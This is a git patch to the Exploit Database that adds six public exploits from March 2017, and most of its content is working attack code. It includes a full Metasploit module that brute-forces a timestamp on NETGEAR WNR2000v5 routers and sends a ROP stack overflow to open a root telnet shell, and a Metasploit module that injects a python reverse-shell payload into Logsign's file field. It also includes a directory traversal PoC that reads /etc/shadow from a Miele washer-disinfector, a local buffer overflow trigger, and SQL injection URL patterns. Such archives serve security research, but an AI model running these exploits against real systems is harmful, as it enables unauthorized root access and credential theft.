From 570f8aec26656078e30bbeab4f24dad6fce49782 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 25 Mar 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-03-25 6 new exploits wifirxpower - Local Buffer Overflow Miele Professional PG 8528 - Directory Traversal NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit) Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit) Gr8 Tutorial Script - SQL Injection Gr8 Gallery Script - SQL Injection --- files.csv | 6 + platforms/hardware/remote/41718.txt | 69 +++++++ platforms/hardware/remote/41719.rb | 270 ++++++++++++++++++++++++++++ platforms/linux/dos/41715.txt | 141 +++++++++++++++ platforms/php/webapps/41716.txt | 19 ++ platforms/php/webapps/41717.txt | 19 ++ platforms/python/remote/41720.rb | 77 ++++++++ 7 files changed, 601 insertions(+) create mode 100755 platforms/hardware/remote/41718.txt create mode 100755 platforms/hardware/remote/41719.rb create mode 100755 platforms/linux/dos/41715.txt create mode 100755 platforms/php/webapps/41716.txt create mode 100755 platforms/php/webapps/41717.txt create mode 100755 platforms/python/remote/41720.rb diff --git a/files.csv b/files.csv index dbb87a56d..4ffd1f27e 100644 --- a/files.csv +++ b/files.csv @@ -5424,6 +5424,7 @@ id,file,description,date,author,platform,type,port 41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 +41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -15384,6 +15385,9 @@ id,file,description,date,author,platform,type,port 41693,platforms/multiple/remote/41693.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit)",2003-03-07,Metasploit,multiple,remote,0 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0 +41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0 +41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80 +41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -37621,3 +37625,5 @@ id,file,description,date,author,platform,type,port 41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0 +41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 +41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/hardware/remote/41718.txt b/platforms/hardware/remote/41718.txt new file mode 100755 index 000000000..dfeb1b5ae --- /dev/null +++ b/platforms/hardware/remote/41718.txt @@ -0,0 +1,69 @@ +Title: +====== +Miele Professional PG 8528 - Web Server Directory Traversal + +Author: +======= +Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG + +CVE-ID: +======= +CVE-2017-7240 + +Risk Information: +================= +Risk Factor: Medium +CVSS Base Score: 5.0 +CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N +CVSS Temporal Vector: CVSS2#E:POC/RL:OF/RC:C +CVSS Temporal Score: 3.9 + +Timeline: +========= +2016-11-16 Vulnerability discovered +2016-11-10 Asked for security contact +2016-11-21 Contact with Miele product representative +2016-12-03 Send details to the Miele product representative +2017-01-19 Asked for update, no response +2017-02-03 Asked for update, no response +2017-03-23 Public disclosure + +Status: +======= +Published + +Affected Products: +================== +Miele Professional PG 8528 (washer-disinfector) with ethernet interface. + +Vendor Homepage: +================ +https://www.miele.co.uk/professional/large-capacity-washer-disinfectors-560.htm?mat=10339600&name=PG_8528 + +Details: +======== +The corresponding embeded webserver "PST10 WebServer" typically listens to port 80 and is prone to a directory traversal attack, therefore an unauthenticated attacker may be able to exploit this issue to access sensitive information to aide in subsequent attacks. + +Proof of Concept: +================= +~$ telnet 192.168.0.1 80 +Trying 192.168.0.1... +Connected to 192.168.0.1. +Escape character ist '^]'. +GET /../../../../../../../../../../../../etc/shadow HTTP/1.1 + +HTTP/1.1 200 OK +Date: Wed, 16 Nov 2016 11:58:50 GMT +Server: PST10 WebServer +Content-Type: application/octet-stream +Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT +Content-disposition: attachment; filename="./etc/shadow" +Accept-Ranges: bytes +Content-Length: 52 + +root:$1$$Md0i[...snip...]Z001:10933:0:99999:7::: + +Fix: +==== +We are not aware of an actual fix. + diff --git a/platforms/hardware/remote/41719.rb b/platforms/hardware/remote/41719.rb new file mode 100755 index 000000000..0c8f583c8 --- /dev/null +++ b/platforms/hardware/remote/41719.rb @@ -0,0 +1,270 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'time' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::CRand + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow', + 'Description' => %q{ + The NETGEAR WNR2000 router has a buffer overflow vulnerability in the hidden_lang_avi + parameter. + In order to exploit it, it is necessary to guess the value of a certain timestamp which + is in the configuration of the router. An authenticated attacker can simply fetch this + from a page, but an unauthenticated attacker has to brute force it. + Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but + it is guaranteed that it can be bruteforced. + This module implements both modes, and it works very reliably. It has been tested with + the WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with hardware + revisions v4 and v3, but this has not been tested - with these routers it might be necessary + to adjust the LibcBase variable as well as the gadget addresses. + }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'Platform' => ['unix'], + 'References' => + [ + ['CVE', '2016-10174'], + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'], + ['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability'] + ], + 'Targets' => + [ + [ 'NETGEAR WNR2000v5', + { + 'LibcBase' => 0x2ab24000, # should be the same offset for all firmware versions (in libuClibc-0.9.30.1.so) + 'SystemOffset' => 0x547D0, + 'GadgetOffset' => 0x2462C, + #The ROP gadget will load $sp into $a0 (which will contain the system() command) and call $s0 (which will contain the address of system()): + #LOAD:0002462C addiu $a0, $sp, 0x40+arg_0 + #LOAD:00024630 move $t9, $s0 + #LOAD:00024634 jalr $t9 + 'Payload' => + { + 'BadChars' => "\x00\x25\x26", + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + } + ], + ], + 'Privileged' => true, + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DisclosureDate' => 'Dec 20 2016', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(80), + OptString.new('HttpUsername', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']), + OptString.new('HttpPassword', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']), + ], self.class) + register_advanced_options( + [ + OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]), + OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting a shell', 200]) + ], self.class) + end + + def check + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + if res && res.headers['WWW-Authenticate'] + auth = res.headers['WWW-Authenticate'] + if auth =~ /WNR2000v5/ + return Exploit::CheckCode::Detected + elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/ + return Exploit::CheckCode::Unknown + end + end + Exploit::CheckCode::Safe + end + + def uri_encode (str) + "%" + str.scan(/.{2}|.+/).join("%") + end + + def calc_address (libc_base, offset) + addr = (libc_base + offset).to_s(16) + uri_encode(addr) + end + + def get_current_time + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + if res && res['Date'] + date = res['Date'] + return Time.parse(date).strftime('%s').to_i + end + end + + def get_auth_timestamp + res = send_request_raw({ + 'uri' => '/lang_check.html', + 'method' => 'GET', + # automatically uses HttpPassword and HttpUsername to authenticate + }) + if res && res.code == 401 + # try again, might fail the first time + res = send_request_raw({ + 'uri' => '/lang_check.html', + 'method' => 'GET', + # automatically uses HttpPassword and HttpUsername to authenticate + }) + end + if res && res.code == 200 + if res.body =~ /timestamp=([0-9]{8})/ + $1.to_i + end + end + end + + # Do some crazyness to force Ruby to cast to a single-precision float and + # back to an integer. + # This emulates the behaviour of the soft-fp library and the float cast + # which is done at the end of Netgear's timestamp generator. + def ieee754_round (number) + [number].pack('f').unpack('f*')[0].to_i + end + + + # This is the actual algorithm used in the get_timestamp function in + # the Netgear firmware. + def get_timestamp(time) + srandom_r time + t0 = random_r + t1 = 0x17dc65df; + hi = (t0 * t1) >> 32; + t2 = t0 >> 31; + t3 = hi >> 23; + t3 = t3 - t2; + t4 = t3 * 0x55d4a80; + t0 = t0 - t4; + t0 = t0 + 0x989680; + + ieee754_round(t0) + end + + def get_payload + rand_text_alpha(36) + # filler_1 + calc_address(target['LibcBase'], target['SystemOffset']) + # s0 + rand_text_alpha(12) + # s1, s2 and s3 + calc_address(target['LibcBase'], target['GadgetOffset']) + # gadget + rand_text_alpha(0x40) + # filler_2 + "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload + end + + def send_req(timestamp) + begin + uri_str = (timestamp == nil ? \ + "/apply_noauth.cgi?/lang_check.html" : \ + "/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}") + res = send_request_raw({ + 'uri' => uri_str, + 'method' => 'POST', + 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }, + 'data' => "submit_flag=select_language&hidden_lang_avi=#{get_payload}" + }) + rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + return + end + end + + def exploit + # 1: try to see if the default admin username and password are set + timestamp = get_auth_timestamp + + # 2: now we try two things at once: + # one, if the timestamp is not nil then we got an authenticated timestamp, let's try that + # two, if the timestamp is nil, then let's try without timestamp first (the timestamp only gets set if the user visited the page before) + print_status("#{peer} - Trying the easy way out first") + send_req(timestamp) + begin + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 }) + if not sock.nil? + print_good("#{peer} - Success, shell incoming!") + return handler(sock) + end + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + sock.close if sock + end + + print_bad("#{peer} - Well that didn't work... let's do it the hard way.") + + # no shell? let's just go on and bruteforce the timestamp + # 3: get the current date from the router and parse it + end_time = get_current_time + if end_time.nil? + fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time") + end + if end_time <= datastore['TIME_OFFSET'] + start_time = 0 + else + start_time = end_time - datastore['TIME_OFFSET'] + end + end_time += datastore['TIME_SURPLUS'] + + if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i + end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i + end + + print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.") + print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).") + + # 2: work back from the current router time minus datastore['TIME_OFFSET'] + while true + for time in end_time.downto(start_time) + timestamp = get_timestamp(time) + sleep 0.1 + if time % 400 == 0 + print_status("#{peer} - Still working, trying time #{time}") + end + send_req(timestamp) + begin + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 }) + if sock.nil? + next + end + print_status("#{peer} - Success, shell incoming!") + return handler(sock) + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + sock.close if sock + next + end + end + end_time = start_time + start_time -= datastore['TIME_OFFSET'] + if start_time < 0 + if end_time <= datastore['TIME_OFFSET'] + fail_with(Failure::Unknown, "#{peer} - Exploit failed.") + end + start_time = 0 + end + print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}") + + # let the router clear the buffers a bit... + sleep 30 + end + end +end \ No newline at end of file diff --git a/platforms/linux/dos/41715.txt b/platforms/linux/dos/41715.txt new file mode 100755 index 000000000..6dfef4b3f --- /dev/null +++ b/platforms/linux/dos/41715.txt @@ -0,0 +1,141 @@ +[+] Title: wifirxpower - Local Stack Based Buffer Overflow +[+] Credits / Discovery: Nassim Asrir +[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ +[+] Author Company: Henceforth +[+] CVE: N/A + +Vendor: +=============== + +https://github.com/cnlohr/wifirxpower + + +Download: +=========== + +https://github.com/cnlohr/wifirxpower + + +Vulnerability Type: +=================== + +Local Stack Based Buffer Overflow + + +issue: +=================== + +'wifirx.c' contain a vulnerable code in the line '111' the developer use the 'strcpy' function and does not check the buffer destination and cause a Stack Oveflow. + +Vulnerable Code (102 - 124) wifirx.c: +=================== +int GetQuality( const char * interface, int * noise ) +{ + int sockfd; + struct iw_statistics stats; + struct iwreq req; + + + memset(&stats, 0, sizeof(stats)); + memset(&req, 0, sizeof(struct iwreq)); + strcpy( req.ifr_name, interface ); + req.u.data.pointer = &stats; + req.u.data.length = sizeof(struct iw_statistics); +#ifdef CLEAR_UPDATED + req.u.data.flags = 1; +#endif + + /* Any old socket will do, and a datagram socket is pretty cheap */ + if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { + if( first ) perror("Could not create simple datagram socket"); + first = 0; + //exit(EXIT_FAILURE); + return -1; + } + + +Exploit: +========= + +1 - ./wifirx aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa + +2 - r $(python -c 'print"A"*41') + +Backtrace: +========= +/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ffff6ec3e37] +/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x0)[0x7ffff6ec3e00] +/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401aaa] +/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401d21] +/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xed)[0x7ffff6ddb7ed] +/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401449] + +Memory Map: +=========== +00606000-0062a000 rw-p 00000000 00:00 0 [heap] +7ffff6379000-7ffff638e000 r-xp 00000000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1 +7ffff638e000-7ffff658d000 ---p 00015000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1 +7ffff658d000-7ffff658e000 r--p 00014000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1 +7ffff658e000-7ffff658f000 rw-p 00015000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1 +7ffff658f000-7ffff6594000 r-xp 00000000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0 +7ffff6594000-7ffff6793000 ---p 00005000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0 +7ffff6793000-7ffff6794000 r--p 00004000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0 +7ffff6794000-7ffff6795000 rw-p 00005000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0 +7ffff6795000-7ffff6797000 r-xp 00000000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0 +7ffff6797000-7ffff6996000 ---p 00002000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0 +7ffff6996000-7ffff6997000 r--p 00001000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0 +7ffff6997000-7ffff6998000 rw-p 00002000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0 +7ffff6998000-7ffff699a000 r-xp 00000000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so +7ffff699a000-7ffff6b9a000 ---p 00002000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so +7ffff6b9a000-7ffff6b9b000 r--p 00002000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so +7ffff6b9b000-7ffff6b9c000 rw-p 00003000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so +7ffff6b9c000-7ffff6bb9000 r-xp 00000000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0 +7ffff6bb9000-7ffff6db8000 ---p 0001d000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0 +7ffff6db8000-7ffff6db9000 r--p 0001c000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0 +7ffff6db9000-7ffff6dba000 rw-p 0001d000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0 +7ffff6dba000-7ffff6f6e000 r-xp 00000000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so +7ffff6f6e000-7ffff716d000 ---p 001b4000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so +7ffff716d000-7ffff7171000 r--p 001b3000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so +7ffff7171000-7ffff7173000 rw-p 001b7000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so +7ffff7173000-7ffff7178000 rw-p 00000000 00:00 0 +7ffff7178000-7ffff7188000 r-xp 00000000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0 +7ffff7188000-7ffff7387000 ---p 00010000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0 +7ffff7387000-7ffff7388000 r--p 0000f000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0 +7ffff7388000-7ffff7389000 rw-p 00010000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0 +7ffff7389000-7ffff738b000 r-xp 00000000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0 +7ffff738b000-7ffff758a000 ---p 00002000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0 +7ffff758a000-7ffff758b000 r--p 00001000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0 +7ffff758b000-7ffff758c000 rw-p 00002000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0 +7ffff758c000-7ffff75a4000 r-xp 00000000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so +7ffff75a4000-7ffff77a3000 ---p 00018000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so +7ffff77a3000-7ffff77a4000 r--p 00017000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so +7ffff77a4000-7ffff77a5000 rw-p 00018000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so +7ffff77a5000-7ffff77a9000 rw-p 00000000 00:00 0 +7ffff77a9000-7ffff78a4000 r-xp 00000000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so +7ffff78a4000-7ffff7aa3000 ---p 000fb000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so +7ffff7aa3000-7ffff7aa4000 r--p 000fa000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so +7ffff7aa4000-7ffff7aa5000 rw-p 000fb000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so +7ffff7aa5000-7ffff7bd5000 r-xp 00000000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0 +7ffff7bd5000-7ffff7dd5000 ---p 00130000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0 +7ffff7dd5000-7ffff7dd6000 r--p 00130000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0 +7ffff7dd6000-7ffff7dda000 rw-p 00131000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0 +7ffff7dda000-7ffff7dfc000 r-xp 00000000 08:01 7606759 /lib/x86_64-linux-gnu/ld-2.15.so +7ffff7fd5000-7ffff7fdb000 rw-p 00000000 00:00 0 +7ffff7ff7000-7ffff7ffb000 rw-p 00000000 00:00 0 +7ffff7ffb000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] +7ffff7ffc000-7ffff7ffd000 r--p 00022000 08:01 7606759 /lib/x86_64-linux-gnu/ld-2.15.so +7ffff7ffd000-7ffff7fff000 rw-p 00023000 08:01 7606759 /lib/x86_64-linux-gnu/ld-2.15.so +7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] +ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] + + +Tested on: +=============== + +Linux Ubuntu x86_64 + + + + + + diff --git a/platforms/php/webapps/41716.txt b/platforms/php/webapps/41716.txt new file mode 100755 index 000000000..b1a44be2f --- /dev/null +++ b/platforms/php/webapps/41716.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Gr8 Tutorial Script - SQL Injection +# Google Dork: N/A +# Date: 24.03.2017 +# Vendor Homepage: http://gr8script.com/ +# Software: http://gr8script.com/gr8_tutorial_script.php +# Demo: http://www.gr8script.com/gr8tutorial/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/users.php?user=[SQL] +# http://localhost/[PATH]/track/54[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41717.txt b/platforms/php/webapps/41717.txt new file mode 100755 index 000000000..14429e9bc --- /dev/null +++ b/platforms/php/webapps/41717.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Gr8 Gallery Script - SQL Injection +# Google Dork: N/A +# Date: 24.03.2017 +# Vendor Homepage: http://gr8script.com/ +# Software: http://gr8script.com/gr8gallery.php +# Demo: http://www.gr8script.com/gr8gallery/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/video-gallery/X[SQL] +# http://localhost/[PATH]/photo-gallery/X[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/python/remote/41720.rb b/platforms/python/remote/41720.rb new file mode 100755 index 000000000..59c4adfcb --- /dev/null +++ b/platforms/python/remote/41720.rb @@ -0,0 +1,77 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Logsign Remote Command Injection', + 'Description' => %q{ + This module exploits an command injection vulnerability in Logsign. + By exploiting this vulnerability, unauthenticated users can execute + arbitrary code under the root user. + + Logsign has a publicly accessible endpoint. That endpoint takes a user + input and then use it during operating system command execution without + proper validation. + + This module was tested against 4.4.2 and 4.4.137 versions. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/unexpected-journey-3-visiting-another-siem-and-uncovering-pre-auth-privileged-remote-code-execution/'] + ], + 'Privileged' => true, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'DefaultOptions' => + { + 'payload' => 'python/meterpreter/reverse_tcp' + }, + 'Targets' => [ ['Automatic', {}] ], + 'DisclosureDate' => 'Feb 26 2017', + 'DefaultTarget' => 0 + )) + + end + + def check + p_hash = {:file => "#{rand_text_alpha(15 + rand(4))}.raw"} + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'api', 'log_browser', 'validate'), + 'ctype' => 'application/json', + 'data' => JSON.generate(p_hash) + ) + + if res && res.body.include?('{"message": "success", "success": true}') + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + print_status("Delivering payload...") + + p_hash = {:file => "logsign.raw\" quit 2>&1 |python -c \"#{payload.encoded}\" #"} + + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'api', 'log_browser', 'validate'), + 'ctype' => 'application/json', + 'data' => JSON.generate(p_hash) + ) + end +end \ No newline at end of file